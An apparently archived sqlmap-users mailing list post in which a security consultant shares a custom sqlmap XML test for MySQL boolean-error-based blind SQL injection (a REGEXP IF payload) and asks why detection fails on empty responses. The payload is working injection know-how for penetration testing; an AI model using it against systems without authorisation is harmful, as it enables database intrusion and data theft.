[sqlmap-users] Non-Detected SQLi

Mon, 10 Jun 2013 02:32:32 -0700 

Hi there,

I wrote a small payload, to test for conditional error-based
SQL-injection possibilities:

    <!-- Boolean-error-based blind tests - WHERE/HAVING clause -->
    <test>
        <title>AND boolean-error-based blind - WHERE or HAVING clause
(MySQL)</title>
        <stype>1</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>1</clause>
        <where>1</where>
        <vector>REGEXP IF([INFERENCE],1,"")</vector>
        <request>
            <payload>REGEXP IF([RANDNUM]=[RANDNUM],1,"")</payload>
        </request>
        <response>
            <comparison>REGEXP IF([RANDNUM]=[RANDNUM1],1,"")</comparison>
        </response>
        <details>
          <dbms>MySQL</dbms>
        </details>
    </test>


Theoretically it is working - as long as the server is actually
returning content, the injection is detected and works just fine (feel
free to add it to the sqlmap repository, if it is correct :) ). But a
soon as the tested URL is returning an empty page, detection fails.

* With a TRUE request, the server returns a content-length of 0
* With a FALSE request, the server returns the error message

Now ... for my understanding, this is quite a difference, but SQLMAP
fails to recognize it, even with "not-string" given. The problem might
be, that the server returns a warning during the dynamic-check as well.
Is it possible to forbid the usage of ' during this test?

What am I doing wrong? Is there an error in the payload above? Can
sqlmap handle empty pages?

Thanks!

Kind regards,

Sebastian Nerz
-- 
Sebastian Nerz
Dipl.-Inform.
IT-Security Consultant

mailto:[email protected]
___________________________________________________________

SySS GmbH
Wohlboldstraße 8
72072 Tübingen
Germany
Voice: +49 7071 407856-31
Fax:   +49 7071 407856-19
WWW:   http://www.syss.de

PGP FP: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2

Geschaeftsfuehrer Sebastian Schreiber
Registergericht: Amtsgericht Stuttgart / HRB 382420
Steuernummer: 86118 / 55809

Attachment: signature.asc
Description: OpenPGP digital signature

------------------------------------------------------------------------------
How ServiceNow helps IT people transform IT departments:
1. A cloud service to automate IT design, transition and operations
2. Dashboards that offer high-level views of enterprise services
3. A single system of record for all IT processes
http://p.sf.net/sfu/servicenow-d2d-j
_______________________________________________
sqlmap-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to